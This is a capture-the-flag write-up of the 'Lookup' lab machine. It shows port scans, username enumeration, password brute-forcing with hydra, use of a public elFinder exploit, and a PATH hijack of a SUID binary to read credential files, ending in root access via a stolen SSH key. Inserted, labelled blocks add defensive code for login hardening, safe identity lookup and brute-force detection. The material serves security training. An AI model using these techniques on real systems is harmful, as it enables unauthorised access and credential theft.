The following post by anthonyjsaab is licensed under
0 - Introduction
"Lookup offers a treasure trove of learning opportunities for aspiring hackers. This intriguing machine showcases various real-world vulnerabilities, ranging from web application weaknesses to privilege escalation techniques. By exploring and exploiting these vulnerabilities, hackers can sharpen their skills and gain invaluable experience in ethical hacking. Through "Lookup," hackers can master the art of reconnaissance, scanning, and enumeration to uncover hidden services and subdomains. They will learn how to exploit web application vulnerabilities, such as command injection, and understand the significance of secure coding practices. The machine also challenges hackers to automate tasks, demonstrating the power of scripting in penetration testing."
1 - Port Scans
1a - Discovery
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS -T4 -p- lookup.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-23 06:46 EET
Nmap scan report for lookup.thm (10.10.25.215)
Host is up (0.10s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 260.46 seconds
1b - Versioning and OS fingerprinting
┌──(kali㉿kali)-[~]
└─$ sudo nmap -A -p22,80 lookup.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-23 06:51 EET
Nmap scan report for lookup.thm (10.10.25.215)
Host is up (0.092s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 44:5f:26:67:4b:4a:91:9b:59:7a:95:59:c8:4c:2e:04 (RSA)
| 256 0a:4b:b9:b1:77:d2:48:79:fc:2f:8a:3d:64:3a:ad:94 (ECDSA)
|_ 256 d3:3b:97:ea:54:bc:41:4d:03:39:f6:8f:ad:b6:a0:fb (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Login Page
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Adtran 424RG FTTH gateway (93%), Linux 2.6.32 (93%), Linux 2.6.39 - 3.2 (93%), Linux 3.1 - 3.2 (93%), Linux 3.2 - 4.9 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 103.29 ms 10.11.0.1
2 99.73 ms lookup.thm (10.10.25.215)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.85 seconds
1c - Vulners
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV --script vulners --script-args mincvss=7.5 -p22,80 lookup.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-23 06:53 EET
Nmap scan report for lookup.thm (10.10.25.215)
Host is up (0.11s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 107.75 seconds
Even if the login form returns a generic response when we submit random credentials, we could still find some clues if the username is correct:
As seen above, two usernames produce a response that differs from all the others: the message now states that the password is wrong, implying that 'admin' and 'jose' are valid usernames.
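The behaviour exploited above is a classic username-enumeration weakness: the login handler answers differently depending on whether the username exists. The following Python snippet is an added example, not code from the post or from the Lookup machine, with a constructed in-memory user store (the usernames mirror the write-up, the passwords and salt are made up). It shows the leaky pattern beside a hardened variant that returns the same message and performs the same amount of hashing work whether or not the username exists, plus a small probe a defender can run against either function to confirm which one leaks.

```python
import hashlib
import hmac

# Constructed sample user store: username -> (salt, PBKDF2-SHA256 hash).
# Not the machine's real database; only the usernames follow the write-up.
_SALT = b"constructed-salt-16b"
_ITERATIONS = 20_000


def _hash(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, _ITERATIONS)


USERS = {
    "admin": (_SALT, _hash("constructed-admin-pw", _SALT)),
    "jose": (_SALT, _hash("constructed-jose-pw", _SALT)),
}

# Dummy record used for unknown usernames so that a failed lookup still
# costs one PBKDF2 evaluation (keeps timing uniform as well as the message).
_DUMMY = (_SALT, _hash("constructed-dummy-pw", _SALT))


def login_verbose(username: str, password: str) -> str:
    """Leaky variant: the response text reveals whether the username exists."""
    if username not in USERS:
        return "Wrong username"
    salt, stored = USERS[username]
    if hmac.compare_digest(_hash(password, salt), stored):
        return "OK"
    return "Wrong password"


def login_uniform(username: str, password: str) -> str:
    """Hardened variant: identical message and identical work for any failure."""
    salt, stored = USERS.get(username, _DUMMY)
    ok = hmac.compare_digest(_hash(password, salt), stored) and username in USERS
    return "OK" if ok else "Invalid username or password"


def leaks_usernames(login, known: str = "admin", unknown: str = "nobody") -> bool:
    """Self-check for a login handler: submit a bad password once with a
    username that exists and once with one that does not. Any difference
    in the two responses is an enumeration oracle."""
    return login(known, "not-the-password") != login(unknown, "not-the-password")


if __name__ == "__main__":
    print("verbose handler leaks usernames:", leaks_usernames(login_verbose))
    print("uniform handler leaks usernames:", leaks_usernames(login_uniform))
```

The probe only compares response bodies; in a real assessment you would also compare status codes, response lengths and timing, which is why the hardened handler hashes against a dummy record instead of returning early.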
2biv - Password bruteforcing
Since admin is the more interesting username, we are going to bruteforce the password associated with admin:
A password X stands out. Even though we got the initial error, this password in particular did return a different response than the other attempts.
Since the attempt failed with admin, we will try it with jose:
We now have valid credentials! However, attempting to login to SSH using these credentials will fail. We will stick with HTTP for now. The successful attempt in HTTP sends us to another VHOST. It seems that the absence of a valid cookie was the reason why we did not detect the 'files.lookup.thm' VHOST earlier.
2c - files.lookup.thm: Jackpot?
When logging in successfully in lookup.thm using the browser, we are redirected to this page:
All of these files have credentials in them. None of them are useful when bruteforcing SSH. These files are completely useless.
2d - Exploit & Foothold
Examining the source code, we can locate many instances where elFinder is mentioned. A comment even includes a link to its GitHub repo:
It turns out this web file manager is quite popular! With around 7K commits and 5K stars, maybe some exploit is out there?
We will try the 46481.py exploit. However, we need to tweak it: the Python script must include, in every HTTP request it sends, the cookie obtained after a successful login to lookup.thm. The changes are on lines 26, 27, 40, 46, 51 and 58.
pwm is owned by root and has the SUID and SGID bits set! Running the mentioned binary gives the following output:
www-data@lookup:/var$ /usr/sbin/pwm
/usr/sbin/pwm
[!] Running 'id' command to extract the username and user ID (UID)
[!] ID: www-data
[-] File /home/www-data/.passwords not found
Exfiltrating this binary to my Kali for further analysis:
From the above output, we can see that the pwm binary prints the contents of /home/%s/.passwords, where %s is the username taken from the output of the call to id. It happens that the user think does have this file, and we cannot read it as www-data:
www-data@lookup:/var$ ls -la /home/think/.passwords
ls -la /home/think/.passwords
-rw-r----- 1 root think 525 Jul 30 2023 /home/think/.passwords
We can also see from the ltrace output that the program tries to invoke id without specifying the absolute path (lines 5 & 6). We can abuse this ambiguity.
3b - Abusing SUID - Going for think's passwords
We write an executable that prints the same output id would produce for think, so that pwm looks up /home/think/.passwords instead of /home/www-data/.passwords:
www-data@lookup:/var$ id think
id think
uid=1000(think) gid=1000(think) groups=1000(think)
www-data@lookup:/tmp$ cat id
cat id
#!/bin/bash
echo 'uid=1000(think) gid=1000(think) groups=1000(think)'
www-data@lookup:/tmp$ chmod +x id
chmod +x id
www-data@lookup:/tmp$ ./id
./id
uid=1000(think) gid=1000(think) groups=1000(think)
www-data@lookup:/tmp$ which id
which id
/usr/bin/id
www-data@lookup:/tmp$ PATH=.:$PATH
PATH=.:$PATH
www-data@lookup:/tmp$ which id
which id
./id
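The root cause behind this PATH hijack is a privileged binary that spawns `id` by relative name and trusts its text, and that builds a file path from that text. The following C code is an added example written here, not the pwm source or any code from the post, showing how such a binary should obtain the caller's identity and build the path instead. It assumes nothing about pwm beyond what ltrace showed above (an unqualified `id` call and the /home/%s/.passwords format string); the function names are the example's own.

```c
#include <pwd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Return 1 if PATH contains an entry that is not an absolute directory:
 * ".", an empty element (both mean the current directory) or any other
 * relative name. These are exactly the entries that let a planted ./id
 * shadow /usr/bin/id for a privileged process. Returns 0 otherwise. */
int path_has_relative_entry(const char *path)
{
    if (path == NULL)
        return 0;
    const char *p = path;
    for (;;) {
        const char *sep = strchr(p, ':');
        size_t len = sep ? (size_t)(sep - p) : strlen(p);
        if (len == 0 || p[0] != '/')
            return 1;
        if (sep == NULL)
            break;
        p = sep + 1;
    }
    return 0;
}

/* Resolve the calling user's name from the kernel-supplied real UID via
 * the passwd database, instead of spawning `id` and parsing its output.
 * Nothing here consults PATH, so PATH=.:$PATH has no effect on the result.
 * Returns 0 on success, -1 if the UID has no entry or buf is too small. */
int resolve_real_username(char *buf, size_t buflen)
{
    struct passwd *pw = getpwuid(getuid());
    if (pw == NULL || pw->pw_name == NULL)
        return -1;
    if (strlen(pw->pw_name) + 1 > buflen)
        return -1;
    strcpy(buf, pw->pw_name);
    return 0;
}

/* Build /home/<user>/.passwords, refusing any name that could escape the
 * user's home directory. Returns 0 on success, -1 on rejection/truncation. */
int build_passwords_path(const char *user, char *out, size_t outlen)
{
    if (user == NULL || user[0] == '\0')
        return -1;
    if (strchr(user, '/') != NULL || strcmp(user, ".") == 0 || strcmp(user, "..") == 0)
        return -1;
    int n = snprintf(out, outlen, "/home/%s/.passwords", user);
    if (n < 0 || (size_t)n >= outlen)
        return -1;
    return 0;
}

int main(void)
{
    char user[64];
    char path[256];

    /* A setuid program should not trust an inherited PATH at all; this
     * check merely reports the condition the write-up abused. */
    if (path_has_relative_entry(getenv("PATH")))
        fprintf(stderr, "[!] PATH contains a relative entry; not safe for a privileged binary\n");

    if (resolve_real_username(user, sizeof user) != 0) {
        fprintf(stderr, "[-] cannot resolve calling user\n");
        return 1;
    }
    if (build_passwords_path(user, path, sizeof path) != 0) {
        fprintf(stderr, "[-] refusing to build path for user '%s'\n", user);
        return 1;
    }
    printf("[!] ID: %s\n[!] would read %s\n", user, path);
    return 0;
}
```

The same fix applies to any setuid helper: take identity from getuid()/getpwuid(), never from a child process found through PATH, and if a child must be spawned, call it by absolute path with a sanitised environment.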
In the previous part, we effectively got a wordlist. We will use it to try and login to SSH using think as a username:
┌──(kali㉿kali)-[~]
└─$ hydra -vV -l think -P /home/kali/think_passwords.txt -t 4 -I ssh://lookup.thm
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-11-24 19:30:16
[DATA] max 4 tasks per 1 server, overall 4 tasks, 49 login tries (l:1/p:49), ~13 tries per task
[DATA] attacking ssh://lookup.thm:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://think@10.10.125.133:22
[INFO] Successful, password authentication is supported by ssh://10.10.125.133:22
[ATTEMPT] target lookup.thm - login "think" - pass "jose1006" - 1 of 49 [child 0] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose1004" - 2 of 49 [child 1] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose1002" - 3 of 49 [child 2] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose1001teles" - 4 of 49 [child 3] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose100190" - 5 of 49 [child 1] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose10001" - 6 of 49 [child 2] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose10.asd" - 7 of 49 [child 0] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose10+" - 8 of 49 [child 3] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose0_07" - 9 of 49 [child 1] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose0990" - 10 of 49 [child 2] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose0986$" - 11 of 49 [child 0] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose098130443" - 12 of 49 [child 3] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose0981" - 13 of 49 [child 1] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose0924" - 14 of 49 [child 0] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose0923" - 15 of 49 [child 2] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose0921" - 16 of 49 [child 3] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "thepassword" - 17 of 49 [child 1] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose(1993)" - 18 of 49 [child 3] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose'sbabygurl" - 19 of 49 [child 0] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose&vane" - 20 of 49 [child 2] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose&takie" - 21 of 49 [child 1] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose&samantha" - 22 of 49 [child 0] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose&pam" - 23 of 49 [child 2] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose&jlo" - 24 of 49 [child 3] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose&jessica" - 25 of 49 [child 0] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose&jessi" - 26 of 49 [child 1] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "josemario.AKA(think)" - 27 of 49 [child 2] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose.medina." - 28 of 49 [child 3] (0/0)
[22][ssh] host: lookup.thm login: think password: REDACTED!!
[STATUS] attack finished for lookup.thm (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-11-24 19:30:42
We got the password!
┌──(kali㉿kali)-[~]
└─$ ssh think@lookup.thm
think@lookup.thm's password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-156-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sun 24 Nov 2024 05:31:32 PM UTC
System load: 0.0 Processes: 141
Usage of /: 59.7% of 9.75GB Users logged in: 0
Memory usage: 25% IPv4 address for ens5: 10.10.125.133
Swap usage: 0%
Expanded Security Maintenance for Applications is not enabled.
7 updates can be applied immediately.
To see these additional updates run: apt list --upgradable
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Sun May 12 12:07:25 2024 from 192.168.14.1
think@lookup:~$ cat user.txt
REDACTED!!
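From the defender's side, the hydra run above leaves an unmistakable trace in sshd's logging: a burst of "Failed password" lines for one account from one source within seconds, followed by an "Accepted password". The Python below is an added detection example, not part of the post; the log excerpt is constructed to resemble what the run would produce (the timestamps and the source address 10.11.0.1 come from the write-up, the PIDs and ports are made up, and the year is assumed because syslog omits it). It parses the lines and flags any source exceeding a failure threshold inside a sliding window, noting whether a successful login followed the burst.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed auth.log excerpt (not a real capture from the machine).
SAMPLE_LOG = """\
Nov 24 19:30:17 lookup sshd[2201]: Failed password for think from 10.11.0.1 port 51002 ssh2
Nov 24 19:30:17 lookup sshd[2203]: Failed password for think from 10.11.0.1 port 51004 ssh2
Nov 24 19:30:18 lookup sshd[2205]: Failed password for think from 10.11.0.1 port 51006 ssh2
Nov 24 19:30:18 lookup sshd[2207]: Failed password for think from 10.11.0.1 port 51008 ssh2
Nov 24 19:30:19 lookup sshd[2209]: Failed password for invalid user admin from 10.11.0.1 port 51010 ssh2
Nov 24 19:30:20 lookup sshd[2211]: Failed password for think from 10.11.0.1 port 51012 ssh2
Nov 24 19:30:42 lookup sshd[2250]: Accepted password for think from 10.11.0.1 port 51090 ssh2
Nov 24 19:35:01 lookup sshd[2300]: Failed password for think from 192.168.14.1 port 40000 ssh2
Nov 24 19:35:30 lookup sshd[2301]: Accepted password for think from 192.168.14.1 port 40002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+ ssh2$"
)


def parse_sshd_lines(text, year=2024):
    """Return (timestamp, result, user, source_ip) tuples for password-auth
    events; lines that are not sshd password results are ignored."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["result"], m["user"], m["ip"]))
    return events


def detect_bruteforce(events, threshold=5, window_s=60):
    """Map each offending source IP to (max failures within one window,
    whether an Accepted login from that IP followed the first failure)."""
    by_ip = defaultdict(list)
    for ts, result, user, ip in events:
        by_ip[ip].append((ts, result, user))

    alerts = {}
    for ip, evs in by_ip.items():
        evs.sort()
        fails = [ts for ts, result, _ in evs if result == "Failed"]
        # Sliding window over failure timestamps: largest count of failures
        # whose first and last entries are at most window_s apart.
        best, j = 0, 0
        for i, t in enumerate(fails):
            while (t - fails[j]).total_seconds() > window_s:
                j += 1
            best = max(best, i - j + 1)
        if best >= threshold:
            success_after = any(
                result == "Accepted" and ts >= fails[0] for ts, result, _ in evs
            )
            alerts[ip] = (best, success_after)
    return alerts


if __name__ == "__main__":
    for ip, (count, success) in detect_bruteforce(parse_sshd_lines(SAMPLE_LOG)).items():
        print(f"{ip}: {count} failures in window, success afterwards: {success}")
```

The "success afterwards" flag is what turns a noisy brute-force alert into an incident: a burst of failures that ends in an Accepted login from the same source means the guessed password worked and the account should be treated as compromised. The second source in the sample, with a single failure, stays below the threshold and is not reported.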
4 - Vertical PrivEsc
Right off the bat, the first try at manual enum got me this:
think@lookup:~$ sudo -l
[sudo] password for think:
Matching Defaults entries for think on lookup:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User think may run the following commands on lookup:
(ALL) /usr/bin/look
We save root's private key to Kali in a file named root, restrict its permissions, and log in over SSH with it:
┌──(kali㉿kali)-[~]
└─$ nano root
┌──(kali㉿kali)-[~]
└─$ chmod 600 root
┌──(kali㉿kali)-[~]
└─$ ssh -i root root@lookup.thm
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-156-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sun 24 Nov 2024 05:59:10 PM UTC
System load: 0.0 Processes: 147
Usage of /: 59.7% of 9.75GB Users logged in: 1
Memory usage: 25% IPv4 address for ens5: 10.10.125.133
Swap usage: 0%
Expanded Security Maintenance for Applications is not enabled.
7 updates can be applied immediately.
To see these additional updates run: apt list --upgradable
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Mon May 13 10:00:24 2024 from 192.168.14.1
root@lookup:~# cat root.txt
REDACTED!!